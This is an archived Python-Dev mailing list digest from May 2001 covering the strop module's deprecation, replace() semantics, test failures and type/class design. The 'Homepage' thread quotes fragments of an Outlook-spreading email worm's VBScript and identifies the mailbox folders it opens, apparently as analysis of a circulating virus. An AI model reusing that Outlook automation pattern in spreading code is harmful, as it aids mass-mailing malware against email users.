or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly
    y'rs  - tim


From gward at python.net  Thu May 10 03:08:58 2001
From: gward at python.net (Greg Ward)
Date: Wed, 9 May 2001 21:08:58 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <20010509210858.A3467@gerg.ca>

On 09 May 2001, Guido van Rossum said:
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
imported, except when imported by string.py.  (No idea how you'd
implement that, I'm just spouting off.)  Then it could go away in 2.3.

I don't think there's anything particularly controversial about 'strop'
going away after one release with a deprecation warning -- it's not
'string', after all!  (Ie. imported by every single scrap of Python code
ever written before string methods came along, and by quite a lot since
then.)

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
I joined scientology at a garage sale!!


From guido at digicool.com  Thu May 10 04:12:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:12:55 -0500
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400."
             <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com> 
Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>

> test_strop.py contains this line:
> 
>     test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0)
> 
> string_tests.py has this:
> 
>     test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)
> 
> IOW, the test suite insists that
> 
>     strop.replace('one!two!three!', '!', '@', 0)
> 
> replace all matches but that
> 
>     string.replace('one!two!three!', '!', '@', 0)
> and
>     'one!two!three!'.replace('!', '@', 0)
> 
> replace nothing.
> 
> I've been thrashing like a madman trying to fix a common bug in both modules
> (in out-of-synch copies of mymemreplace), and every time I think I fix
> something "the other" module breaks.  The above appears to be why.
> 
> My opinion:  the test_strop.py test is in error, and so was strop_replace()
> in stropmodule.c.  I'm checking in changes accordingly, but won't mind
> getting yelled at if you disagree.

HMMMMMM!  In Python 1.5, a count of zero always replaces all
occurrences, both using string and using strop.  In 2.0 and later,
strop's replace(..., 0) still replaces all, but string's replaces
none.  The replace() method of strings and unicode objects agrees with
string.py.

I think this change was made in the sake of ease of documenting the
behavior: special-casing the count of zero is unexpected.

I very vaguely recall that it was discussed on this list.

So this suggests that test_string is correct, and string.replace()
(and the methods) shouldn't be "fixed"!

But since we're not really supporting strop any more, I think that
strop shouldn't be changed either.  So we'll have to live with the
difference -- sorry!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:13:20 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:13:20 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>

[Guido]
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

So if Fred changes the docs to say it's obsolete, maybe we can actually rip
out the buggy and redundant code it contains in about 2 years <wink>.

cheeredly y'rs  - tim


From guido at digicool.com  Thu May 10 04:25:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:25:43 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400."
             <20010509210858.A3467@gerg.ca> 
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>  
            <20010509210858.A3467@gerg.ca> 
Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com>

> Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
> imported, except when imported by string.py.  (No idea how you'd
> implement that, I'm just spouting off.)  Then it could go away in 2.3.

I have had the necessary mods sitting in my directory for months (it
was one of my first tests for using the warnings module), but decided
against checking it in because I found there's quite a bit of code
that triggered the warnings.  Maybe I should check it in into 2.2a0,
so developers can get used to it.

> I don't think there's anything particularly controversial about 'strop'
> going away after one release with a deprecation warning -- it's not
> 'string', after all!  (Ie. imported by every single scrap of Python code
> ever written before string methods came along, and by quite a lot since
> then.)

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 04:27:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:27:23 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400."
             <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com> 
Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>

> [Guido]
> > In my mind, strop is obsolete.  We keep it around because some losers
> > like to import it directly, but it's basically dead, and except for a
> > few functions, string.py doesn't use it any more.  (The exceptions are
> > maketrans, lowercase, uppercase, whitespace.)
> 
> So if Fred changes the docs to say it's obsolete, maybe we can actually rip
> out the buggy and redundant code it contains in about 2 years <wink>.

Yes, but in the mean time the fact that it's buggy doesn't bother me
at all.  Let it be as buggy as it always was -- that's one more reason
to stop using it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:33:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:33:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDPKBAA.tim.one@home.com>

[Guido]
> HMMMMMM!  In Python 1.5, a count of zero always replaces all
> occurrences, both using string and using strop.  In 2.0 and later,
> strop's replace(..., 0) still replaces all, but string's replaces
> none.  The replace() method of strings and unicode objects agrees with
> string.py.
>
> I think this change was made in the sake of ease of documenting the
> behavior: special-casing the count of zero is unexpected.

Yes, -1 == infinity is much clearer <wink>.

> I very vaguely recall that it was discussed on this list.
>
> So this suggests that test_string is correct, and string.replace()
> (and the methods) shouldn't be "fixed"!

I didn't change their behavior wrt replace()'s interpretation of count, but
to repair an unrelated bug (bogus MemoryError for an empty-string *result*)
that happened to appear in both copies of mymemreplace sitting in the code
base (one in stringobject.c, another but out-of-synch one in stropmodule.c).
That's how stropmodule got sucked into this:  to fix the gross null-string
result bug common to both.

> But since we're not really supporting strop any more, I think that
> strop shouldn't be changed either.  So we'll have to live with the
> difference -- sorry!

OK, I've restored the 0 == infinity semantics to strop.replace() and
test_strop.py, but have not backed out the null-string result fix, nor the
pain to make the mymemreplace clones identical again.


From tim.one at home.com  Thu May 10 04:00:30 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:00:30 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>

[Guido]
> Yes, but in the mean time the fact that it's buggy doesn't bother me
> at all.  Let it be as buggy as it always was -- that's one more reason
> to stop using it! :-)

I think that's unsustainable in this specific case:  stringobject and
stropmodule contained several utility functions with the same names that
clearly started life as identical code.  Over time they got out of synch, and
when they punched me in the face today, I had no idea which was "right" and
which "wrong".  Turned out they both had the same bug, and the clearest way
to fix it in stringobject.c without leaving a more inconsistent x-module mess
was to bring the once-common utility routines back into synch.

As /F said, though, the mymemreplace() approach is inefficient and "should
be" replaced wholesale.  If that's done in stringobject.c alone, great, then
I won't care about the legacy routines in stropmodule.c either.  What I can't
abide is having one copy of a function in the codebase work and a clone of it
not work -- unless you can keep the undocumented history of both in your mind
at all times, you're just as likely to bump into the broken one first when
searching the code base, and if you're unlucky never  even realize it is "the
broken one" (or, if you're lucky, bump into the good one too, and then pee
away time trying to understand the differences).

i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't-
    eat-it-by-mistake<wink>-ly y'rs  - tim


From Jason.Tishler at dothill.com  Thu May 10 04:06:15 2001
From: Jason.Tishler at dothill.com (Jason Tishler)
Date: Wed, 9 May 2001 22:06:15 -0400
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500
References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com>
Message-ID: <20010509220615.A1928@dothill.com>

Mike,

On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote:
> > I am playing around with CygWin (which came with Pyhton 2.1 
> > installed).  While I can run command line programs, Tkinter is not 
> > part of the package.  TCL/TK is installed and I have been able to 
> > build TK GUI's.  How can I get Tkinter added to my Python package?  
> > Thanks.
> 
> Beats me.  Ask whoever produces the CygWin port.

I am the Cygwin Python maintainer.  Please see the following for my
views on adding Tkinter support to Cygwin Python:

    http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html

If Tkinter support is important to you, then please submit the appropriate
patches for consideration to the Python Patch Manager on SourceForge.

Norman Vine has built a Cygwin Python that supports Tkinter.  See the
following for his build procedure:

    http://www.vso.cape.com/~nhv/files/python/

Perhaps you would like to collaborate with Norman on this effort?

Thanks,
Jason

-- 
Jason Tishler
Director, Software Engineering       Phone: +1 (732) 264-8770 x235
Dot Hill Systems Corp.               Fax:   +1 (732) 264-8798
82 Bethany Road, Suite 7             Email: Jason.Tishler at dothill.com
Hazlet, NJ 07730 USA                 WWW:   http://www.dothill.com


From tim.one at home.com  Thu May 10 04:54:45 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:54:45 -0400
Subject: [Python-Dev] test_mmap failing?
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>

I checked in a change to mmapmodule.c earlier today, to close a patch
complaining about unused vrbl warnings.

Here's the changed routine before ("value" is unused):

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        char value;
        char *where;
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                where = self->data + self->pos;
                value = (char) *(where);
                self->pos += 1;
                return Py_BuildValue("c", (char) *(where));
        } else {
               PyErr_SetString (PyExc_ValueError, "read byte out of
                                                   range");
                return NULL;
        }
}

and after:

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                char value = self->data[self->pos];
                self->pos += 1;
                return Py_BuildValue("c", value);
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of
                                                    range");
                return NULL;
        }
}

I'll be damned if I can see any semantic difference, and test_mmap worked
fine on Windows after the change.  But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python
../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22]
Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in
test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an
mmap'ed file yet, let alone tried to read from it.  The only thing test_mmap
did so far is (the first comment is bogus -- that's the builtin Python open()
function):

    # Create an mmap'ed file   # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)    # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my
confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
current CVS?  Fred, are you *sure* it fails for you -- if so, does the
problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs  - tim


From jeremy at digicool.com  Thu May 10 05:17:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 9 May 2001 23:17:34 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.2126.368714.159135@slothrop.digicool.com>

The latest CVS build works on my Linux 2.2.12 system.  No problem with
test_mmap.  But test_pty does fail with some complaints about FCNTL,
which Fred just removed.  Maybe Fred is working in an alternate
universe where test_mmap and test_pty are swapped.

Jeremy


From barry at digicool.com  Thu May 10 06:08:42 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 00:08:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
	<LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
Message-ID: <15098.5194.677531.35326@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

    TP> Oh, fuck.  Somebody remind me why we have both stropmodule.c
    TP> and stringobject.c?  These bugs exist in both.

IIRC, I once proposed to share code bases through elaborate
#includes and exported functions, but that never went very far.
Guido's already pronounced on this, and I'd say good riddance to
strop.

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Yes, but in the mean time the fact that it's buggy doesn't
    GvR> bother me at all.  Let it be as buggy as it always was --
    GvR> that's one more reason to stop using it! :-)
-----------------------------------^^^^

For a minute there, I thought you said "to strop using it". :)

-Barry


From fredrik at pythonware.com  Thu May 10 08:22:53 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 10 May 2001 08:22:53 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid>

Tim Peters wrote:
> I think that's unsustainable in this specific case:  stringobject and
> stropmodule contained several utility functions with the same names that
> clearly started life as identical code.  Over time they got out of synch, and
> when they punched me in the face today, I had no idea which was "right" and
> which "wrong".  Turned out they both had the same bug, and the clearest way
> to fix it in stringobject.c without leaving a more inconsistent x-module mess
> was to bring the once-common utility routines back into synch.
> 
> As /F said, though, the mymemreplace() approach is inefficient and "should
> be" replaced wholesale.  If that's done in stringobject.c alone, great, then
> I won't care about the legacy routines in stropmodule.c either.

as a footnote, SRE uses the same source code to generate
both 8-bit and 16-bit versions of the match engine.  I see no
reason why we cannot do the same for the string operations
(PyString, PyUnicode, and strop).

if anyone wants me to look into this, just say "go ahead".  

> > no wonder u"".replace() is 30% faster than "".replace() ;-)
> 
> For a given number of characters or bytes <wink>?

characters.  judging from the SRE benchmarks, modern platforms
can process 16-bit characters as fast as they can process 8-bit
characters.

Cheers /F


From thomas at xs4all.net  Thu May 10 11:31:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 10 May 2001 11:31:38 +0200
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200
References: <200105091712.TAA05172@core.inf.ethz.ch>
Message-ID: <20010510113138.K16486@xs4all.nl>

On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote:

> Set s=CreateObject("Outlook.Application")
> Set t=s.GetNameSpace("MAPI")
> Set u=t.GetDefaultFolder(6)

[..]

> Set u=t.GetDefaultFolder(3)

I know it's off-topic, but Greg started it! ;-) Does anyone know which
folders those two 'GetDefaultFolder' statements open ? I suspect it's
sent-mail and trash, or some such, but I don't know enough about Outlook to
know if it even *has* sent-mail and trash folders :)

Thanx for sending it through, Samuele, it was fun reading, and useful to our
helpdesk (especially the fact that it only sends out mails once, even though
it starts the porn page every time, and that it doesn't do anything harmful
at all.)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From MarkH at ActiveState.com  Thu May 10 12:36:13 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Thu, 10 May 2001 20:36:13 +1000
Subject: [Python-Dev] Homepage
In-Reply-To: <20010510113138.K16486@xs4all.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEEPDMAA.MarkH@ActiveState.com>

> > Set u=t.GetDefaultFolder(6)
> > Set u=t.GetDefaultFolder(3)

> I know it's off-topic, but Greg started it! ;-) Does anyone know which
> folders those two 'GetDefaultFolder' statements open ? I suspect it's
> sent-mail and trash, or some such, but I don't know enough about 
> Outlook to
> know if it even *has* sent-mail and trash folders :)

Running makepy.py over the Outlook type library yields the following:

	olFolderCalendar              =0x9        # from enum OlDefaultFolders
	olFolderContacts              =0xa        # from enum OlDefaultFolders
	olFolderDeletedItems          =0x3        # from enum OlDefaultFolders
	olFolderDrafts                =0x10       # from enum OlDefaultFolders
	olFolderInbox                 =0x6        # from enum OlDefaultFolders
	olFolderJournal               =0xb        # from enum OlDefaultFolders
	olFolderNotes                 =0xc        # from enum OlDefaultFolders
	olFolderOutbox                =0x4        # from enum OlDefaultFolders
	olFolderSentMail              =0x5        # from enum OlDefaultFolders
	olFolderTasks                 =0xd        # from enum OlDefaultFolders

So it appears the inbox and deleted items.

Mark.


From tim.one at home.com  Thu May 10 10:54:42 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 10 May 2001 04:54:42 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
Message-ID: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>

> python  ../lib/test/regrtest.py test___all__

test___all__
test test___all__ failed -- tty has no __all__ attribute
1 test failed: test___all__

C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious
sequence of failing imports manages to leave behind a damaged module object
in sys.modules that prevents test___all__'s import of tty from getting the
ImportError it *ought* to get under Windows (and betting termios is the
ultimate culprit).

I've fixed enough of these.  Somebody who thinks this is "a feature" gets to
do it this time <wink/snarl>.


From guido at digicool.com  Thu May 10 15:43:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 08:43:07 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400."
             <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com> 
Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com>

> [Guido]
> > Yes, but in the mean time the fact that it's buggy doesn't bother
> > me at all.  Let it be as buggy as it always was -- that's one more
> > reason to stop using it! :-)

[Tim]
> I think that's unsustainable in this specific case: stringobject and
> stropmodule contained several utility functions with the same names
> that clearly started life as identical code.  Over time they got out
> of synch, and when they punched me in the face today, I had no idea
> which was "right" and which "wrong".  Turned out they both had the
> same bug, and the clearest way to fix it in stringobject.c without
> leaving a more inconsistent x-module mess was to bring the
> once-common utility routines back into synch.

Of course, the real bug was copy-and-paste programming.  The common
code should have been factored out rather than copied.

> As /F said, though, the mymemreplace() approach is inefficient and
> "should be" replaced wholesale.  If that's done in stringobject.c
> alone, great, then I won't care about the legacy routines in
> stropmodule.c either.  What I can't abide is having one copy of a
> function in the codebase work and a clone of it not work -- unless
> you can keep the undocumented history of both in your mind at all
> times, you're just as likely to bump into the broken one first when
> searching the code base, and if you're unlucky never even realize it
> is "the broken one" (or, if you're lucky, bump into the good one
> too, and then pee away time trying to understand the differences).

Here's an idea.  We remove stropmodule.c, and replace it with a
strop.py that issues a warning and then imports selected things from
string.py.

The only complication is that there are a few constants and one
function in strop that are still imported into string.py; I propose to
move these to an "internal" extension module (e.g. "_string").

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 16:02:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 09:02:59 -0500
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400."
             <15098.2126.368714.159135@slothrop.digicool.com> 
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>  
            <15098.2126.368714.159135@slothrop.digicool.com> 
Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com>

> The latest CVS build works on my Linux 2.2.12 system.  No problem with
> test_mmap.  But test_pty does fail with some complaints about FCNTL,
> which Fred just removed.  Maybe Fred is working in an alternate
> universe where test_mmap and test_pty are swapped.

Strange.  The *both* work for me with the latest CVS (and even after
removing all *.pyc files!), although last night (?) I recall seeing a
test_pty faulure too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Thu May 10 16:16:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:16:24 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
	<200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <15098.41656.128146.826459@beluga.mojam.com>

    Guido> Yes, but in the mean time the fact that it's buggy doesn't bother
    Guido> me at all.  Let it be as buggy as it always was -- that's one
    Guido> more reason to stop using it! :-)

In fact, perhaps the import warning could mention that strop is buggy and
won't be fixed... :-)

Skip


From skip at pobox.com  Thu May 10 16:32:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:32:15 -0500
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
Message-ID: <15098.42607.84670.323361@beluga.mojam.com>

    >> python  ../lib/test/regrtest.py test___all__
    Tim> test___all__
    Tim> test test___all__ failed -- tty has no __all__ attribute
    Tim> 1 test failed: test___all__

grumble, grumble...

    Tim> I assume this is yet another case where some excruciatingly
    Tim> non-obvious sequence of failing imports manages to leave behind a
    Tim> damaged module object in sys.modules that prevents test___all__'s
    Tim> import of tty from getting the ImportError it *ought* to get under
    Tim> Windows (and betting termios is the ultimate culprit).

I (thankfully) gave up even pretending to run Windows recently, so I can
only make a suggestion for others who look into this problem.  Try this:
Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails.  You should get the actual module
that failed to import.  If foo.py consists of simply "import bar", and I
import it, I see that bar couldn't be imported:

    >>> try:
    ...   import foo
    ... except ImportError, msg:
    ...   print msg
    ... 
    No module named bar

Skip


From fdrake at acm.org  Thu May 10 16:57:59 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:57:59 -0400 (EDT)
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > But having suffered too many "impossible problems" the last 36 hours, my
 > confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
 > current CVS?  Fred, are you *sure* it fails for you -- if so, does the
 > problem actually go away if you revert mmapmodule.c?

  It was indeed showing the behavior I described!  I figured out what
it was this morning and closed the patch again.
  The problem, of course(!), had nothing to do with mmap, before or
after any of the recent changes to mmap.  Or any old changes.  It had
a lot to do with the change I made to the socket module.  ;-)
  While figuring out the reported bug in the socket module, I created
named pipes, including one named "foo".  The mmap test opens a file
"foo" with mode "w+" in the directory in which I just happened to
create the named pipe, so it ended up with a file object opened on a
pipe -- things just don't work the same for these beasts!  Needless to
say test_mmap failed with a cryptic error message.
  This begs the question, though -- should tests that create temp
files check that the files don't already exist, and fail with a more
descriptive error if they do?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Thu May 10 16:59:08 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:59:08 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
	<15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com>

Jeremy Hylton writes:
 > The latest CVS build works on my Linux 2.2.12 system.  No problem with
 > test_mmap.  But test_pty does fail with some complaints about FCNTL,
 > which Fred just removed.  Maybe Fred is working in an alternate
 > universe where test_mmap and test_pty are swapped.

  Or, I could just be working in an alternate universe altogether.
I've been known to do that....


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From paulp at ActiveState.com  Thu May 10 23:55:36 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 14:55:36 -0700
Subject: [Python-Dev] Type/class
Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com>

-------- Original Message --------
Log Message:

Make attributes of subtypes writable, but only for dynamic subtypes
derived in Python using a class statement; static subtypes derived in
C still have read-only attributes.
-------- Original Message --------

I would like to argue that "plain old C types" should act as if they
have __dict__s for consistency with other types. It is sometimes useful
to be able to annotate objects by adding attributes to them. But this
only works with class instance objects, not instances of types.

 Paul Prescod


From jeremy at digicool.com  Thu May 10 23:59:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 10 May 2001 17:59:34 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <15099.3910.648127.25900@slothrop.digicool.com>

>>>>> "PP" == Paul Prescod <paulp at ActiveState.com> writes:

  PP> I would like to argue that "plain old C types" should act as if
  PP> they have __dict__s for consistency with other types. It is
  PP> sometimes useful to be able to annotate objects by adding
  PP> attributes to them. But this only works with class instance
  PP> objects, not instances of types.

Every type should have an __dict__ of type dict?  Then every dict
must have an __dict__, including the __dict__ of __dict__?

Once every object has an __dict__, every object will be mutable.  Then
no object will be usable as a dict key and we can get rid of dict's
entirely.

Jeremy


From fdrake at cj42289-a.reston1.va.home.com  Fri May 11 00:47:14 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 18:47:14 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update for the maintenance version docs.


From fdrake at cj42289-a.reston1.va.home.com  Fri May 11 01:04:40 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 19:04:40 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for the development version of the docs.


From guido at digicool.com  Fri May 11 02:03:13 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 19:03:13 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST."
             <3AFB0E58.1F0ABCA6@ActiveState.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> 
Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com>

Glad somebody is watching what I'm doing here -- I was afraid I was
having too much fun by myself! :-)

> -------- Original Message --------
> Log Message:
> 
> Make attributes of subtypes writable, but only for dynamic subtypes
> derived in Python using a class statement; static subtypes derived in
> C still have read-only attributes.
> -------- Original Message --------
> 
> I would like to argue that "plain old C types" should act as if they
> have __dict__s for consistency with other types.

Good point.  Plain old types currently (in the descr-branch) have a
readonly dict (using a proxy) and no settable attributes.  I will
probably give types settable attributes in a next revision, but I
prefer not to make the type's dict writable -- I need to be able to
watch the setattr calls so that if someone changes
DictType.__getitem__ I can change the mp_subscript to a C function
that calls the __getitem__ method.  For speed reasons, if you don't
override them, the C tp_slot functions carry out the operation
directly, and the __slot__ methods call the C tp_slot functions; but
when __slot__ is overridden, tp_slot must call __slot__.

> It is sometimes useful
> to be able to annotate objects by adding attributes to them. But this
